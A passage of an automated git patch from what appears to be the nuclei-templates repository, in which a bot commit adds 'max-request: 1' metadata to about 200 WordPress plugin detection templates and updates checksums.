-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7064,7 +7064,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:83deeebf8e7d3375034644e0b42af3bc2be0bab8 +templates-checksum.txt:4c4c12df86c22b7da8a1a9e99790de7a5a131415 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 3e0fee092310e53c304bf98d4dcd0d9b71982daa Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 13 Sep 2023 06:08:51 +0000 Subject: [PATCH 0337/1090] TemplateMan Update [Wed Sep 13 06:08:51 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: 